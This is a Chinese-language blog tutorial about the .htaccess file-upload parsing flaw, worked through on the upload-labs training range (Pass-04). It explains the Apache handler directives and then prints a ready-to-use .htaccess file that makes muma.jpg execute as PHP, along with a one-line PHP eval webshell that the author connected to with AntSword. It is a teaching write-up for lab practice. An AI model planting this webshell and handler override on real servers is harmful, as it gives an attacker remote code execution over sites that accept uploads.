.htaccess文件上传解析漏洞

最新推荐文章于 2025-10-20 11:41:19 发布
原创 最新推荐文章于 2025-10-20 11:41:19 发布 · 7.9k 阅读 · 30 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web

  • 测试环境

    upload-labs靶场(Pass-04)
     
     

  • .htaccess原理

    .htaccess文件是Apache服务器下的一个配置文件。其主要负责相关目录下的网页配置,即:在一个特定的文档目录中放置一个包含一个或多个指令的文件来对网页进行配置。
    不过需要注意的是,.htaccess文件的作用域为其所在目录与其所有的子目录,不过若是子目录也存在.htaccess文件,则会覆盖父目录的.htaccess效果。
     
     

  • .htaccess实例


<ifModule mime_module>

AddHandler php5-script .jpg
<!-- 将.jpg文件按照php代码进行解析执行 -->

AddType application/x-httpd-php .jpg
<!-- 将.jpg文件按照php代码进行解析执行 -->

Sethandler application/x-httpd-php
<!-- 将该目录及子目录下的文件均按照php文件解析执行 -->

</ifModule>
<!-- 该种匹配方式并不推荐,极易造成误伤 -->


<FilesMatch "muma.jpg">

Sethandler application/x-httpd-php
<!-- 将匹配到的 muma.jpg 文件按照php解析执行 -->

Addhandler php5-script .jpg
<!-- 将匹配到的 muma.jpg 文件按照php解析执行 -->

</FilesMatch>
<!-- 该种匹配方式较为精准,不会造成大批的误伤情况 -->

下面来说一下这几种写法的区别:

  • Sethandler 指令:
    将该目录及子目录的所有文件均映射为php文件类型
  • Addhandler 指令:
    使用 php5-script 处理器来解析所匹配到的文件
  • AddType 指令
    将特定扩展名文件映射为php文件类型
     
     

  • Upload-labs(Pass-04)

这一关的漏洞便在于 .htaccess 文件上传解析漏洞,使用上面我们所提到的知识便能够通过这一关
在这里插入图片描述我们需要先准备好两个文件(.htaccess 和 muma.jpg

<!-- .htaccess文件 -->
<FilesMatch "muma.jpg">
Sethandler application/x-httpd-php
</FilesMatch>

//muma.jpg
<?php @eval($_POST["test"]); ?>

接下来就是先将 .htaccess 文件上传,从而覆盖父目录对上传目录的影响,然后再上传 muma.jpg 文件,从而完成 .htaccess 文件上传解析漏洞的利用
放一个该关卡蚁剑成功连接的图片
在这里插入图片描述 
 
由于作者也是在学习之中,所以文章错误之处还请在评论区指正

个人新建博客,欢迎访问

.htaccess上传漏洞解析漏洞
m0_51607644的博客
08-17 4347
写在前边 漏洞学习三步走: 1.了解漏洞原理 2.知道漏洞形成条件,复现漏洞 3.解决如何防范 .htaccess上传漏洞 .htaccess文件作用 概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目 录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自 定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、 禁止目录列表、配置默认文档等功能。 Unix、Linux系统或者是任何版本的Apach
文件上传漏洞-通过.htaccess文件绕过
m0_73902453的博客
10-30 1470
3.先将.htaccess上传上去,然后再打开抓包上传木马文件(1.php),然后将名字修改成1.jpg,因为刚刚的.htaccess已经上传到服务器,告诉服务器.jpg文件可以当作.php文件执行。通过这个文件,网站管理员可以进行各种配置,例如重定向、访问控制、URL重写等。结尾的文件都当作 PHP 脚本来处理,而不是作为普通文本文件或图像文件。这意味着,即使它们有文本或影像文件的扩展名,服务器将尝试执行其中的 PHP代码。2.这里以upload-labs(less-4)为例,我们先来看看靶场的源代码。
.htaccess的前世今生
最新发布
长风破浪会有时的博客
10-20 734
自定义错误页面为不同的 HTTP 错误状态码指定自定义页面。示例:ErrorDocument 404 /errors/404.html。
文件上传绕过】——解析漏洞_.htaccess文件解析漏洞
weixin_45588247的博客
07-28 3999
文章目录一、实验目的:二、工具:三、实验环境:四、漏洞利用前提:五、原理:六、利用方式:七、`.htaccess文件`内容:八、`.htaccess文件`制作:1. 直接创建文件:2. 通过`cmd命令行`创建:九、实验过程: 一、实验目的: 1、了解什么是.htaccess文件。 2、通过upload-labs闯关游戏(Pass-04),掌握.htaccess文件解析漏洞技术。 二、工具: cmd命令行 火狐/谷歌浏览器 三、实验环境: 靶 机: windows10虚拟机:192.168.100
文件上传漏洞.htaccess文件解析漏洞
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
06-01 8191
  htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
文件上传漏洞.htaccess
不好好做安全的运维足球狗
03-12 6318
0x00 前言 .htaccess文件(“分布式配置文件”)提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令将受到限制。管理员可以通过Apache的AllowOverride指令来设置。 概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htacce...
漏洞知识点《.htaccess 解析漏洞深度解析
qq_46143339的博客
03-17 1189
htaccess
文件上传漏洞.htaccess文件
m0_67212501的博客
10-11 907
(Hypertext Access,超文本访问)是 Apache Web 服务器使用的分布式配置文件。:可以放置在网站目录树的任何目录中:配置指令会影响所在目录及其所有子目录:修改后无需重启 Apache 服务器即可立即应用。
文件上传漏洞.htaccess文件
weixin_65279640的博客
04-17 1363
提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有。简言之,.htaccess就是Apache服务器上的一个可以实现特殊功能的配置文件。http.conf文件中设置了 AllowOverried All ,才能使用.htaccess文件。通过htaccess文件,可以帮我们实现:网页。想要利用好.htaccess文件,我们就需要先了解一下什么是htaccess。,可以把特定文件转化成php执行的特性来进行文件上传漏洞利用。
漏洞复现篇——.htaccess文件解析漏洞
爱国小白帽
02-17 9366
实验环境: PHPstudy php5.6以下不带nts的版本 upload-labs-master上传漏洞靶场 服务器没有禁止.htaccess文件的上传,且服务商允许用户使用自定义.htaccess文件 原理:.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或...
文件上传漏洞08】.htaccess攻击实验(基于upload-labs-4靶场)
Fighting_hawk的博客
03-02 4729
1. 当存在文件上传漏洞时,只要恶意代码没有被过滤,就存在被执行的危险。 2. 掌握修改.htaccess以改变各种文件执行程序的方法。
警惕htaccess文件上传解析漏洞
whatiwhere的博客
11-24 9795
实验环境 操作机: Windows XP 目标机:Windows 2003 目标网址:www.test.com 实验目的 了解htaccess文件解析的利用方法 掌握如何去修复此漏洞 实验工具 中国菜刀:是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理,本次试验主要用到其动态脚本管理功能 实验内容 实验步骤 步骤1:...
网络安全——文件上传漏洞
weixin_71208450的博客
07-08 2650
文件上传漏洞是指由于程序员未对上传的文件进行严格的验证和过滤,而导致的用户可以越过其本身权限向服务器上传可执行的动态脚本文件。如常见的头像上传,图片上传,oa办公文件传,媒体上传,允许用户上传文件,如果过滤不严格,恶意用户利用件上传漏洞上传有害的可以执行脚本文件到服务器中,可以获取服务器的权限,或进一步危害服务器。确定目标站点允许的文件类型和上传点。尝试上传恶意文件,观察服务器响应。使用代理工具抓取上传请求,分析验证逻辑。根据分析结果,修改请求以绕过客户端和服务器端验证。
WEB入门——文件上传漏洞
热门推荐
HasntStartIsOver的博客
06-04 1万+
文件上传漏洞服务端代码未对客户端上传的文件进行严格的验证,导致漏洞。如果.php后缀被限制,可以尝试:.php3、php4、.PHp(修改大小写)、.phtml、.pht等后缀,WebShell的内容一样。这两个配置的意思就是:我们指定一个文件,那么该文件就会被包含在要执行的php文件中(如index.php)。如果客户端JS脚本有加限制(例如上传图片,JS脚本显示了只能上传图片格式,不能上传.php后缀的文件)。1、上传的文件是web脚本语言,服务器的web容器解释并执行了用户上传的脚本,脚本语言执行。
文件上传漏洞.htaccess文件上传截断、条件竞争)
2401_84168785的博客
07-16 288
1.(1)GET方式的%00会被服务器进行URL解码成null,而POST方式需要先自己进行URL解码成null后再发送报文,而本关卡为post型,故而需要使用bp将%00进行url解码,如下所示。截断的产生主要原因就是存在%00这个字符,PHP<5.3.4时,会把它当做结束符,导致后面的数据直接忽略,造成截断,上传时如果上传文件的路径可控,可以通过00截断,进行木马上传。(1)当上传文件时,会显示上传成功,但会立马显示文件已删除,如下图。(3)然后再将文件路径输入再抓包,多次请求,直到请求成功。
1-Web安全——文件上传漏洞
网络安全
08-20 4728
1. 上传文件漏洞原理 现在大部分web应用程序都有上传文件的功能,例如个人博客上传各种文件和图片,招聘网站上传doc文件格式的简历等等。只要web应用程序有上传文件的功能,就可能会存在上传文件漏洞。 为什么会有上传文件漏洞? 一般用户在上传文件时,如果web应用程序的代码没有对上传的文件进行严格的校验和过滤时,容易出现允许上传任意文件的情况,然后恶意攻击者利用这一点上传恶意脚本文件(aspx,php,jsp等文件)到服务器,从而获取网站的管理员权限,对服务器造成巨大威胁,这个恶意文件则被称为webs
上传漏洞终结篇
10-25 1479
一、写在前面***这个上传漏洞利用的原理只是针对form格式上传的asp和php脚本***NC(Netcat)   用于提交数据包   DOS界面下运行:   NC -vv www.***.com 80   -vv: 回显   80:  www端口   1.txt: 就是你要发送的数据包  (更多使用方法请查看本区的帖子) WSE(WSockExpert)   对本机端口的监视,抓取IE提交的数据
文件上传漏洞学习
m0_63017297的博客
06-17 1792
定义:以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以 将其称之为一种网页后门。攻击者在入侵了一个网站后,通常会将这些asp或php后 门文件与网站服务器web目录下正常的网页文件混在一起,然后使用浏览器来访问这 些后门,得到一个命令执行环境,以达到控制网站服务器的目的,可以实现文件上传 下载、修改文件、操作数据库、执行任意命令等操作。这个后门文件就是所谓的 Webshell。
Node.js中模块加载机制
Tiger's blog
09-27 283
Node.js中模块查找规则: 【注】以下查找规则均来自于在VS Code中的实践,对于文件以及相应文件的截图太多,比较麻烦,就以文字形式呈现出来。 1.当模块拥有路径但没有后缀时 require('./home.js') require('./home') (1)当路径完整时,直接引入模块文件,读取。 (2)当路径不完整时,首先查找同名文件,如果查找到同名文件,则会查找当前文件夹下的package.json文件中的main选项中的入口文件,但入口文件要求在当前文件夹下; 如果找不到入口文件,则会查找当
.htaccess文件上传漏洞
12-31
### 关于 `.htaccess` 文件上传漏洞安全性 #### 什么是`.htaccess`文件上传漏洞? 当Web应用程序允许用户上传文件到服务器,并且这些文件能够被解释执行时,可能会发生`.htaccess`文件上传漏洞。如果攻击者成功上传恶意编写的`.htaccess`文件,则可以修改Apache配置设置,进而控制访问权限、重定向流量或绕过其他安全措施。 为了有效防范此类风险,建议采取以下几种策略: - **严格限制文件上传路径**:确保只有特定目录才接受来自用户的文件提交操作;同时,在存储位置方面应远离web根目录[^1]。 - **验证并过滤上传的内容类型**:通过白名单机制限定可接收的MIME类型以及扩展名列表,拒绝任何可疑格式的文档进入系统内部[^3]。 - **禁用危险指令解析**:编辑全局级别的httpd.conf或其他等效配置文件中的选项,关闭不必要的模块和服务端处理功能,比如PHP短标签支持等[^4]。 - **定期扫描已存在的资源库**:部署自动化工具持续监控项目结构内的所有组件是否存在潜在威胁,及时更新至最新稳定版本以修复官方公布过的缺陷. 另外值得注意的是,虽然适当调整`.htaccess`本身有助于增强局部区域的安全防护等级,但从长远来看,还是应该优先考虑采用更高级别的防御手段——即构建稳固的应用程序防火墙(WAF),其具备识别异常行为模式的能力,并能依据预设规则自动拦截非法请求,从而大大降低遭受XSS和SQL注入的风险水平[^2]。 最后,启用站点范围内的SSL/TLS协议对于保障数据传输过程中的私密性和完整性同样至关重要。这不仅限于保护敏感信息不被窃听篡改,而且还能防止中间人攻击的发生[^5]。 ```bash # 设置严格的文件权限 chmod 644 /path/to/your/.htaccess ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值